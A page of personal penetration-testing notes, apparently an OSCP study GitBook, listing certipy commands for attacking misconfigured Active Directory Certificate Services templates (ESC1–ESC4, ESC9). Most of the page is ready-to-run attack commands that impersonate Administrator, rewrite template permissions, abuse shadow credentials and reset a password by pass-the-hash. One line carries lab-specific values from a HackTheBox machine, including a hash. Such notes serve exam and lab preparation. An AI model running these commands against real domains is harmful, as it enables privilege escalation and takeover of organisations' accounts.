M4RCG04M
  • 👨‍💻Welcome to my GitBook
  • WRITEUPS
    • HackTheBox
      • Windows
        • Remote
      • Linux
        • Jarvis
        • Tabby
    • Proving Grounds Play
      • BBScute
      • FunBoxEasyEnum
      • Monitoring
      • Loly
      • Pelican
      • Payday
      • Snookums
  • OSCP Preparation List
    • Hack The Box
    • Proving Grounds
  • NOTES
    • UTILS
      • Useful Files
      • Payloads
      • Lateral Movement
    • ENUMERATION
      • Port 79 (finger)
      • Port 80 (HTTP)
      • Port 111 (RPCBIND)
      • PORT 161/udp (SNMP)
      • PORT 389,636,3268,3269 (LDAP)
      • Port 6697 (IRCD)
      • Database Analysis
      • Grafana
    • FILE TRANSFERS
    • ACTIVE DIRECTORY
      • Known Vulnerabilities
      • Without Credentials
        • Classic Attacks
      • With Username
      • Valid Credentials
      • Lateral Move
      • ACLs/ACEs permissions
      • Active Directory Certificate Services (AD CS)
      • Administrator account
      • Domain Admin
    • EXPLOTATION
      • Port 53 (DNS)
      • Port 80 (HTTP)
        • CMS
        • SQL INJECTION
        • XXE
        • File Upload
        • Cross Site Scripting (XSS)
      • Port 3389 (RDP)
      • Password Attacks
        • Hash Cracking
    • PRIVILEGE ESCALATION
      • Windows
        • Enumeration
        • Windows User Privileges
        • Windows Group Privileges
        • Weak Permissions
        • Windows Vulnerabilities
        • Credential Hunting
        • Tools
      • Linux
        • Enumeration
Powered by GitBook
On this page
  • Find Vulnerable Certificates
  • ESC1: Misconfigured Certificate Templates
  • ESC2: Misconfigured Certificate Templates
  • ESC3: Enrollment Agent Templates
  • ESC4: Vulnerable Certificate Template Access Control
  • ESC9
  1. NOTES
  2. ACTIVE DIRECTORY

Active Directory Certificate Services (AD CS)

https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-certificate-services/#esc2-misconfigured-certificate-templates

If we have ports 3268, 3269 open, certificates should be checked!

Find Vulnerable Certificates

certipy find -username <USERNAME>@<DOMAIN> -password <PASSWORD> -dc-ip <RHOST> -vulnerable -stdout

ESC1: Misconfigured Certificate Templates

certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE> -upn administrator@<DOMAIN> -dns <RHOST>
certipy auth -pfx administrator.pfx -dc-ip <RHOST>

ESC2: Misconfigured Certificate Templates

certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE>
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template User -on-behalf-of '<DOMAIN>\Administrator' -pfx <USERNAME>.pfx
certipy auth -pfx administrator.pfx -dc-ip <RHOST>

ESC3: Enrollment Agent Templates

certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE>
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template User -on-behalf-of '<DOMAIN>\Administrator' -pfx <USERNAME>.pfx
certipy auth -pfx administrator.pfx -dc-ip <RHOST>

ESC4: Vulnerable Certificate Template Access Control

First, overwrite the configuration to make it vulnerable to ESC1

certipy-ad template -dc-ip <ip> -u <user> -p <pass> -template <templateName> -target <ip> -save-old

Then, request a certificate based on the ESC4 template, just like ESC1.

certipy-ad req -username <user> -password <pass> -ca <ca_name> -template <templateName> -upn Administrator@<domain> -target-ip <ip> -dns <dns_dc>

Get the hash

certipy-ad auth -pfx administrator_dc01.pfx -dc-ip <ip>

ESC9

User 1 have GenericWrite to user2, we can get the user2 hash using shadow Crentials because of user's1 GenericWrite

certipy shadow auto -username <user1>@<domain> -p <pass1> -account <user2>

We can also change the password of that user:

pth-net rpc password "ca_operator" "Password123" -U "certified.htb"/"management_svc"%"ffffffffffffffffffffffffffffffff":"a091c1832bcdd4677c28b5a6a1295584" -S "10.10.11.41"

In this step, we change the user2 userPrincipalName to Administrator:

certipy account update -username <user1>@<domain> -password <pass1> -user <user2> -upn Administrator

We request the Vulnerable ECS9 Template with the user2

certipy req -username <user2>@<domain> -hashes <hashb> -ca <ca_name> -template <vulnerableESC9 template name>

And finally we get the hash of administrator:

certipy auth -pfx adminitrator.pfx -domain corp.local

PreviousACLs/ACEs permissionsNextAdministrator account

Last updated 4 months ago